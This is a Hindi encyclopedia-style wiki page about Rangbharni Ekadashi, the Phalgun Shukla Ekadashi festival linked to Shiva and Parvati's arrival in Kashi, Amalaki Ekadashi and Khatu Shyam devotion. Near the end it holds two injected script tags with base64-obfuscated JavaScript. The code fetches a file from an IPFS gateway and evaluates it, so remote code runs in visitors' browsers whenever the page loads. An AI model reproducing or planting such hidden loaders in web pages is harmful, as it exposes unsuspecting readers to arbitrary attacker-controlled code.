रंगभरनी एकादशी

भारत डिस्कवरी प्रस्तुति
Revision as of 10:09, 4 March 2015 by रविन्द्र प्रसाद (talk | contribs) (''''रंगभरनी एकादशी''' प्रत्येक वर्ष [[फाल्गुन|फाल्गुन ...' के साथ नया पन्ना बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

रंगभरनी एकादशी प्रत्येक वर्ष फाल्गुन माह में शुक्ल पक्ष की एकादशी को कहा जाता है। इसी दिन 'आमलकी एकादशी' भी मनाई जाती है। यह एकादशी श्री विश्वेश्वर भगवान 'काशीविश्वनाथ' के लिए क्रीड़ा का पर्व है। ऐसा माना जाता है कि इसी दिन भगवान शिव माता पार्वती के साथ काशी पहुँचे थे। इसी कारणवश इस दिन काशी में 'होली' का पर्वकाल प्रारंभ हो जाता है।

महत्त्व

पौराणिक परम्पराओं और मान्यताओं के अनुसार फाल्गुन की शुक्ल पक्ष की एकादशी को बड़ा महत्त्व दिया जाता है। इस एकादशी को 'रंगभरी एकादशी' एवं 'आमलकी एकादशी' कहते हैं। इस एकादशी की विशेषता के तीन मुख्य कारण हैं[1]-

  1. माना जाता है कि इसी दिन शिव पार्वती से विवाह के पश्चात पहली बार अपनी प्रिय नगरी काशी आये थे। रंगभरनी एकादशी का पर्व काशी में माँ पार्वती के प्रथम स्वागत का प्रतिक है।
  2. मान्यता के अनुसार इसी दिन भगवान विष्णु ने सृष्टि की रचना हेतु ब्रह्मा जी एवं आंवले के वृक्ष को जन्म दिया था।
  3. एक अन्य मान्यतानुसार इसी दिन श्याम बाबा का मस्तक पहली बार श्याम कुंड में प्रकट हुआ था। इसलिए इस दिन लाखों श्याम भक्त श्याम दर्शन हेतु खाटू जाते हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. क्यों है फाल्गुन शुक्ल एकादशी इतनी विशेष (हिन्दी) ऑनलाइन प्रसाद.कॉम। अभिगमन तिथि: 04 मार्च, 2015।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः